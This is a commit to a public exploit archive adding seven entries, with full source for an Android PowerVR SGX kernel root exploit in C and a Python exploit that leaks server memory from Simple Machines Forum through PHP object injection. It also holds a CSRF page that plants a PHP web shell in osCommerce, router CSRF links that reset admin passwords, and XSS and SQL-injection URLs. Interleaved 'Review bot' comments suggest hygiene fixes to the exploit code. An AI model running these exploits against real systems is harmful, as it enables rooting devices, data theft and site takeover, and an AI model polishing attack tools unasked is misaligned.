DB: 2015-09-25
7 new exploits
parent
bb2fcd6716
commit
44c9eb6ea9
8 changed files with 615 additions and 0 deletions
|
@ -34594,3 +34594,10 @@ id,file,description,date,author,platform,type,port
|
|||
38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0
|
||||
38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
|
||||
38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0
|
||||
38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
|
||||
38307,platforms/win32/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win32,dos,0
|
||||
38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0
|
||||
38309,platforms/php/webapps/38309.txt,"osCommerce Cross Site Request Forgery Vulnerability",2013-02-12,"Jakub Galczyk",php,webapps,0
|
||||
38310,platforms/android/remote/38310.c,"Android <= 2.3.5 PowerVR SGX Driver Information Disclosure Vulnerability",2011-11-03,"Geremy Condra",android,remote,0
|
||||
38311,platforms/php/webapps/38311.txt,"BlackNova Traders 'news.php' SQL Injection Vulnerability",2013-02-12,ITTIHACK,php,webapps,0
|
||||
38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0
|
||||
|
|
|
318
platforms/android/remote/38310.c
Executable file
318
platforms/android/remote/38310.c
Executable file
|
@ -0,0 +1,318 @@
|
|||
source: http://www.securityfocus.com/bid/57900/info
|
||||
|
||||
The PowerVR SGX driver in Android is prone to an information-disclosure vulnerability.
|
||||
|
||||
Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.
|
||||
|
||||
Android 2.3.5 and prior versions are vulnerable.
|
||||
|
||||
|
||||
/*
|
||||
* levitator.c
|
||||
*
|
||||
* Android < 2.3.6 PowerVR SGX Privilege Escalation Exploit
|
||||
* Jon Larimer <jlarimer@gmail.com>
|
||||
* Jon Oberheide <jon@oberheide.org>
|
||||
*
|
||||
* Information:
|
||||
*
|
||||
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1352
|
||||
*
|
||||
* CVE-2011-1352 is a kernel memory corruption vulnerability that can lead
|
||||
* to privilege escalation. Any user with access to /dev/pvrsrvkm can use
|
||||
* this bug to obtain root privileges on an affected device.
|
||||
*
|
||||
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1350
|
||||
*
|
||||
* CVE-2011-1350 allows leaking a portion of kernel memory to user mode
|
||||
* processes. This vulnerability exists because of improper bounds checking
|
||||
* when returning data to user mode from an ioctl system call.
|
||||
*
|
||||
* Usage:
|
||||
*
|
||||
* $ CC="/path/to/arm-linux-androideabi-gcc"
|
||||
* $ NDK="/path/to/ndk/arch-arm"
|
||||
* $ CFLAGS="-I$NDK/usr/include/"
|
||||
* $ LDFLAGS="-Wl,-rpath-link=$NDK/usr/lib -L$NDK/usr/lib -nostdlib $NDK/usr/lib/crtbegin_dynamic.o -lc"
|
||||
* $ $CC -o levitator levitator.c $CFLAGS $LDFLAGS
|
||||
* $ adb push levitator /data/local/tmp/
|
||||
* $ adb shell
|
||||
* $ cd /data/local/tmp
|
||||
* $ ./levitator
|
||||
* [+] looking for symbols...
|
||||
* [+] resolved symbol commit_creds to 0xc00770dc
|
||||
* [+] resolved symbol prepare_kernel_cred to 0xc0076f64
|
||||
* [+] resolved symbol dev_attr_ro to 0xc05a5834
|
||||
* [+] opening prvsrvkm device...
|
||||
* [+] dumping kernel memory...
|
||||
* [+] searching kmem for dev_attr_ro pointers...
|
||||
* [+] poisoned 16 dev_attr_ro pointers with fake_dev_attr_ro!
|
||||
* [+] clobbering kmem with poisoned pointers...
|
||||
* [+] triggering privesc via block ro sysfs attribute...
|
||||
* [+] restoring original dev_attr_ro pointers...
|
||||
* [+] restored 16 dev_attr_ro pointers!
|
||||
* [+] privileges escalated, enjoy your shell!
|
||||
* # id
|
||||
* uid=0(root) gid=0(root)
|
||||
*
|
||||
* Notes:
|
||||
*
|
||||
* The vulnerability affects Android devices with the PowerVR SGX chipset
|
||||
* which includes popular models like the Nexus S and Galaxy S series. The
|
||||
* vulnerability was patched in the Android 2.3.6 OTA update.
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <dirent.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ioctl.h>
|
||||
|
||||
#define CONNECT_SERVICES 0xc01c670c
|
||||
#define DUMP_SIZE 161920
|
||||
|
||||
typedef struct {
|
||||
uint32_t ui32BridgeID;
|
||||
uint32_t ui32Size;
|
||||
void *pvParamIn;
|
||||
uint32_t ui32InBufferSize;
|
||||
void *pvParamOut;
|
||||
uint32_t ui32OutBufferSize;
|
||||
void * hKernelServices;
|
||||
} PVRSRV_BRIDGE_PACKAGE;
|
||||
|
||||
typedef int (* _commit_creds)(unsigned long cred);
|
||||
typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred);
|
||||
_commit_creds commit_creds;
|
||||
_prepare_kernel_cred prepare_kernel_cred;
|
||||
|
||||
ssize_t
|
||||
fake_disk_ro_show(void *dev, void *attr, char *buf)
|
||||
{
|
||||
commit_creds(prepare_kernel_cred(0));
|
||||
return sprintf(buf, "0wned\n");
|
||||
}
|
||||
|
||||
struct attribute {
|
||||
const char *name;
|
||||
void *owner;
|
||||
mode_t mode;
|
||||
};
|
||||
|
||||
struct device_attribute {
|
||||
struct attribute attr;
|
||||
ssize_t (*show)(void *dev, void *attr, char *buf);
|
||||
ssize_t (*store)(void *dev, void *attr, const char *buf, size_t count);
|
||||
};
|
||||
|
||||
struct device_attribute fake_dev_attr_ro = {
|
||||
.attr = {
|
||||
.name = "ro",
|
||||
.mode = S_IRWXU | S_IRWXG | S_IRWXO,
|
||||
},
|
||||
.show = fake_disk_ro_show,
|
||||
.store = NULL,
|
||||
};
|
||||
|
||||
unsigned long
|
||||
get_symbol(char *name)
|
||||
{
|
||||
FILE *f;
|
||||
unsigned long addr;
|
||||
char dummy, sname[512];
|
||||
int ret = 0;
|
||||
|
||||
f = fopen("/proc/kallsyms", "r");
|
||||
if (!f) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
while (ret != EOF) {
|
||||
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
|
||||
if (ret == 0) {
|
||||
fscanf(f, "%s\n", sname);
|
||||
continue;
|
||||
}
|
||||
if (!strcmp(name, sname)) {
|
||||
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
|
||||
return addr;
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int
|
||||
do_ioctl(int fd, void *in, unsigned int in_size, void *out, unsigned int out_size)
|
||||
{
|
||||
PVRSRV_BRIDGE_PACKAGE pkg;
|
||||
|
||||
memset(&pkg, 0, sizeof(pkg));
|
||||
|
||||
pkg.ui32BridgeID = CONNECT_SERVICES;
|
||||
pkg.ui32Size = sizeof(pkg);
|
||||
pkg.ui32InBufferSize = in_size;
|
||||
pkg.pvParamIn = in;
|
||||
pkg.ui32OutBufferSize = out_size;
|
||||
pkg.pvParamOut = out;
|
||||
|
||||
return ioctl(fd, 0, &pkg);
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
DIR *dir;
|
||||
struct dirent *dentry;
|
||||
int fd, ret, found, trigger;
|
||||
char *dump, *dump_end, buf[8], path[256];
|
||||
unsigned long dev_attr_ro, *ptr;
|
||||
|
||||
printf("[+] looking for symbols...\n");
|
||||
|
||||
commit_creds = (_commit_creds) get_symbol("commit_creds");
|
||||
if (!commit_creds) {
|
||||
printf("[-] commit_creds symbol not found, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
|
||||
if (!prepare_kernel_cred) {
|
||||
printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
dev_attr_ro = get_symbol("dev_attr_ro");
|
||||
if (!dev_attr_ro) {
|
||||
printf("[-] dev_attr_ro symbol not found, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] opening prvsrvkm device...\n");
|
||||
|
||||
fd = open("/dev/pvrsrvkm", O_RDWR);
|
||||
if (fd == -1) {
|
||||
printf("[-] failed opening pvrsrvkm device, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] dumping kernel memory...\n");
|
||||
|
||||
dump = malloc(DUMP_SIZE + 0x1000);
|
||||
dump_end = dump + DUMP_SIZE + 0x1000;
|
||||
memset(dump, 0, DUMP_SIZE + 0x1000);
|
||||
|
||||
ret = do_ioctl(fd, NULL, 0, dump + 0x1000, DUMP_SIZE - 0x1000);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] searching kmem for dev_attr_ro pointers...\n");
|
||||
|
||||
found = 0;
|
||||
for (ptr = (unsigned long *) dump; ptr < (unsigned long *) dump_end; ++ptr) {
|
||||
if (*ptr == dev_attr_ro) {
|
||||
*ptr = (unsigned long) &fake_dev_attr_ro;
|
||||
found++;
|
||||
}
|
||||
}
|
||||
|
||||
printf("[+] poisoned %d dev_attr_ro pointers with fake_dev_attr_ro!\n", found);
|
||||
|
||||
if (found == 0) {
|
||||
printf("[-] could not find any dev_attr_ro ptrs, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] clobbering kmem with poisoned pointers...\n");
|
||||
|
||||
ret = do_ioctl(fd, dump, DUMP_SIZE, NULL, 0);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] triggering privesc via block ro sysfs attribute...\n");
|
||||
|
||||
dir = opendir("/sys/block");
|
||||
if (!dir) {
|
||||
printf("[-] failed opening /sys/block, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
found = 0;
|
||||
while ((dentry = readdir(dir)) != NULL) {
|
||||
if (strcmp(dentry->d_name, ".") == 0 || strcmp(dentry->d_name, "..") == 0) {
|
||||
continue;
|
||||
}
|
||||
|
||||
snprintf(path, sizeof(path), "/sys/block/%s/ro", dentry->d_name);
|
||||
|
||||
trigger = open(path, O_RDONLY);
|
||||
if (trigger == -1) {
|
||||
printf("[-] failed opening ro sysfs attribute, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
memset(buf, 0, sizeof(buf));
|
||||
ret = read(trigger, buf, sizeof(buf));
|
||||
close(trigger);
|
||||
|
||||
if (strcmp(buf, "0wned\n") == 0) {
|
||||
found = 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (found == 0) {
|
||||
printf("[-] could not trigger privesc payload, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] restoring original dev_attr_ro pointers...\n");
|
||||
|
||||
ret = do_ioctl(fd, NULL, 0, dump + 0x1000, DUMP_SIZE - 0x1000);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
found = 0;
|
||||
for (ptr = (unsigned long *) dump; ptr < (unsigned long *) dump_end; ++ptr) {
|
||||
if (*ptr == (unsigned long) &fake_dev_attr_ro) {
|
||||
*ptr = (unsigned long) dev_attr_ro;
|
||||
found++;
|
||||
}
|
||||
}
|
||||
|
||||
printf("[+] restored %d dev_attr_ro pointers!\n", found);
|
||||
|
||||
if (found == 0) {
|
||||
printf("[-] could not restore any pointers, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ret = do_ioctl(fd, dump, DUMP_SIZE, NULL, 0);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (getuid() != 0) {
|
||||
printf("[-] privileges not escalated, exploit failed!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] privileges escalated, enjoy your shell!\n");
|
||||
|
||||
execl("/system/bin/sh", "sh", NULL);
|
||||
|
||||
return 0;
|
||||
}
|
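Review bot: `ret = read(trigger, buf, sizeof(buf));` in the /sys/block loop fills all eight bytes of `buf` with no room for a terminator, so the `strcmp(buf, "0wned\n")` that follows reads past the end of the array whenever an attribute returns eight or more bytes, and the read count is never checked; read `sizeof(buf) - 1` and test it, e.g. `ret = read(trigger, buf, sizeof(buf) - 1);` and `if (ret > 0 && strcmp(buf, "0wned\n") == 0) {`. In get_symbol both fscanf calls use an unbounded `%s` into `sname[512]`, which a width bounds (`"%p %c %511s\n"`), and the FILE opened on /proc/kallsyms is closed on neither return path, so each of the three calls leaks a descriptor. The `malloc(DUMP_SIZE + 0x1000)` result is passed to memset without a NULL check, and the `dir` handle from opendir and the `fd` from open are never closed. These are hygiene issues in the tool itself; none of them changes what the program does when the calls succeed.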
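--- a/platforms/hardware/remote/38308.txt
+++ b/platforms/hardware/remote/38308.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/57877/info
+
+TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.
+
+Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions.
+
+TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.
+
+http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save
+
+http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save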
232
platforms/php/webapps/38304.py
Executable file
232
platforms/php/webapps/38304.py
Executable file
|
@ -0,0 +1,232 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: iso-8859-15 -*-
|
||||
|
||||
#############################################################################
|
||||
# Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit
|
||||
# Authors: Andrea Palazzo
|
||||
# <andrea [dot] palazzo [at] truel [dot] it>
|
||||
# Filippo Roncari
|
||||
# <filippo [dot] roncari [at] truel [dot] it>
|
||||
# Truel Lab ~ http://lab.truel.it
|
||||
# Requirements: SMF <= 2.0.10
|
||||
# PHP <= 5.6.11 / 5.5.27 / 5.4.43
|
||||
# Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt
|
||||
# TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt
|
||||
# TL-2015-SMF01 n/y/a
|
||||
# Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/
|
||||
# Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs
|
||||
############################################################################
|
||||
|
||||
|
||||
import sys, requests, time, os, socket, thread, base64, string, urllib
|
||||
from multiprocessing import Process
|
||||
|
||||
#Payload Config
|
||||
bytes_num = 000 #num of bytes to dump
|
||||
address = 000 #starting memory address
|
||||
|
||||
#Target Config
|
||||
cookie = {'PHPSESSID' : '000'} #SMF session cookie
|
||||
target_host = 'http://localhost/smf/index.php' #URL of target installation index.php
|
||||
csrftoken = ''
|
||||
|
||||
#Local Server Config
|
||||
host = "localhost"
|
||||
port = 31337
|
||||
|
||||
#Memory dump variables
|
||||
dumped = ''
|
||||
current_dump = ''
|
||||
in_string = False
|
||||
brute_index = 0
|
||||
brute_list = list(string.ascii_letters + string.digits)
|
||||
r_ok = 'HTTP/1.0 200 OK' + '\n'
|
||||
r_re = 'HTTP/1.0 302 OK' + '\n'
|
||||
r_body = '''Server: Truel-Server
|
||||
Content-Type: text/xml
|
||||
Connection: keep-alive
|
||||
Content-Length: 395
|
||||
|
||||
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
|
||||
<env:Header>
|
||||
<n:alertcontrol xmlns:n="http://example.org/alertcontrol">
|
||||
<n:priority>1</n:priority>
|
||||
<n:expires>2001-06-22T14:00:00-05:00</n:expires>
|
||||
</n:alertcontrol>
|
||||
</env:Header>
|
||||
<env:Body>
|
||||
<m:alert xmlns:m="http://example.org/alert">
|
||||
<m:msg>Truel</m:msg>
|
||||
</m:alert>
|
||||
</env:Body>
|
||||
</env:Envelope>'''
|
||||
|
||||
|
||||
def serverStart():
|
||||
print "[+] Setting up local server on port " + str(port)
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
if not sock:
|
||||
print "[X] Fatal Error: Unable to create socket"
|
||||
sock.bind((host, port))
|
||||
sock.listen(1)
|
||||
return sock
|
||||
|
||||
def getToken():
|
||||
global csrftoken
|
||||
print "[+] Trying to get a valid CSRF token"
|
||||
for n in range(3): #3 attempts
|
||||
r = requests.get(target_host, cookies=cookie, allow_redirects=False)
|
||||
r = r.text
|
||||
if(r.find("action=logout;")!=-1):
|
||||
break
|
||||
start = r.find("action=logout;")
|
||||
if (start !=-1):
|
||||
end = (r[start+14:]).find('">')
|
||||
csrftoken = r[start+14 : start+end+14]
|
||||
print "[+] Authentication done. Got token " + str(csrftoken)
|
||||
return True
|
||||
else:
|
||||
print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
|
||||
return False
|
||||
|
||||
def prepareForExploit():
|
||||
if not(getToken()): #get CSRF token
|
||||
os._exit(1)
|
||||
target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
|
||||
r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
|
||||
return
|
||||
|
||||
def forgePayload(current_try, address):
|
||||
location = "http://" + current_try
|
||||
payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
|
||||
return payload
|
||||
|
||||
def sendPayload(payload,null):
|
||||
target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
|
||||
try:
|
||||
r = requests.get(target, cookies=cookie, allow_redirects=False)
|
||||
except requests.exceptions.RequestException:
|
||||
print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
|
||||
os._exit(1)
|
||||
return
|
||||
|
||||
def limitReached(dumped):
|
||||
if(len(dumped) >= bytes_num):
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
def printDumped(dumped):
|
||||
d = " "
|
||||
cnt = 1
|
||||
print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
|
||||
print "[+] ======================= Dumped Data ======================="
|
||||
for i in range(bytes_num):
|
||||
d = d + str(dumped[i])
|
||||
if (cnt % 48 == 0):
|
||||
print d
|
||||
d = " "
|
||||
if (cnt == bytes_num):
|
||||
print d
|
||||
cnt = cnt + 1
|
||||
|
||||
def getSoapRequest(sock):
|
||||
connection, sender = sock.accept()
|
||||
request = connection.recv(8192)
|
||||
return (connection, request)
|
||||
|
||||
def sendSoapResponse(connection, content):
|
||||
connection.send(content)
|
||||
connection.close()
|
||||
return
|
||||
|
||||
def getDumpedFromHost(request):
|
||||
i = request.find("Host: ") + 6
|
||||
v = request[i:i+1]
|
||||
return v
|
||||
|
||||
def pushDumped(value, string):
|
||||
global dumped
|
||||
global current_dump
|
||||
global brute_index
|
||||
global address
|
||||
global in_string
|
||||
|
||||
dumped = str(value) + str(dumped)
|
||||
if(string):
|
||||
current_dump = str(value) + str(current_dump)
|
||||
else:
|
||||
current_dump = ""
|
||||
in_string = string
|
||||
address = address-1
|
||||
brute_index = 0
|
||||
print "[" + hex(address) + "] " + str(value)
|
||||
return
|
||||
|
||||
def bruteViaResponse(sock):
|
||||
global brute_index
|
||||
current_try = ""
|
||||
response_ok = r_ok + r_body
|
||||
|
||||
for n in range(19):
|
||||
connection, request = getSoapRequest(sock)
|
||||
if not request:
|
||||
connection.close()
|
||||
return False
|
||||
if request.find("owned")!=-1:
|
||||
pushDumped(getDumpedFromHost(request), True)
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return True
|
||||
else:
|
||||
if((brute_index+1) == len(brute_list)):
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return False
|
||||
brute_index = brute_index + 1
|
||||
if not in_string:
|
||||
current_try = brute_list[brute_index]
|
||||
else:
|
||||
current_try = brute_list[brute_index] + str(current_dump)
|
||||
response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
|
||||
sendSoapResponse(connection,response_re)
|
||||
connection, request = getSoapRequest(sock)
|
||||
if request.find("owned")!=-1:
|
||||
pushDumped(getDumpedFromHost(request), True)
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return True
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return False
|
||||
|
||||
def bruteViaRequest(sock):
|
||||
global brute_index
|
||||
brute_index = 0
|
||||
current_try = ""
|
||||
|
||||
while(True):
|
||||
if(brute_index == len(brute_list)):
|
||||
pushDumped(".", False)
|
||||
if limitReached(dumped):
|
||||
printDumped(dumped)
|
||||
return
|
||||
if not in_string:
|
||||
current_try = brute_list[brute_index]
|
||||
else:
|
||||
current_try = brute_list[brute_index] + str(current_dump)
|
||||
payload = forgePayload(current_try,address)
|
||||
thread.start_new_thread(sendPayload,(payload,""))
|
||||
if not bruteViaResponse(sock):
|
||||
brute_index = brute_index + 1
|
||||
return
|
||||
|
||||
def runExploit():
|
||||
print "[+] Starting exploit"
|
||||
sock = serverStart()
|
||||
prepareForExploit()
|
||||
print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
|
||||
bruteViaRequest(sock)
|
||||
sock.close()
|
||||
print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
runExploit()
|
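Review bot: `getDumpedFromHost` computes `request.find("Host: ") + 6` without checking for -1, so a request with no Host header yields index 5 and a byte of the request line is recorded as if it were dumped data; guard the lookup: `i = request.find("Host: ")` / `if i == -1: return ""` / `return request[i + 6:i + 7]`. In `serverStart` the `if not sock:` test comes after `setsockopt` has already been called on the object, and `socket.socket` raises rather than returning a false value, so that branch is dead and a try/except around the constructor (or nothing) is what is meant. The `null` parameter of `sendPayload` and the `r` result in `prepareForExploit` are unused. The header comment should also state that the script is Python 2 only (print statements, the `thread` module) and depends on the third-party `requests` package, neither of which is documented.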
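--- a/platforms/php/webapps/38309.txt
+++ b/platforms/php/webapps/38309.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/57892/info
+
+osCommerce is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
+
+osCommerce 2.3.3 is vulnerable; other versions may also be affected.
+
+The following example data is available:
+
+<html><body onload="document.runCSRF.submit();">
+<form method="post" name="runCSRF"
+action="http://www.example.com/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
+<input type="hidden" name="file_contents"
+value="<?php $cmd">
+</form>your shell should be here:
+catalog/includes/languages/english/download.php?cmd=id<br></body></html>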
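--- a/platforms/php/webapps/38311.txt
+++ b/platforms/php/webapps/38311.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57910/info
+
+BlackNova Traders is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/bnt/news.php?startdate=2013/02/11[SQLi]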
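--- a/platforms/php/webapps/38312.txt
+++ b/platforms/php/webapps/38312.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/57948/info
+
+AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+AbanteCart 1.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
+
+http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
+
+http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+
+http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E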
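--- a/platforms/win32/dos/38307.txt
+++ b/platforms/win32/dos/38307.txt
@@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=474
+
+---
+The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip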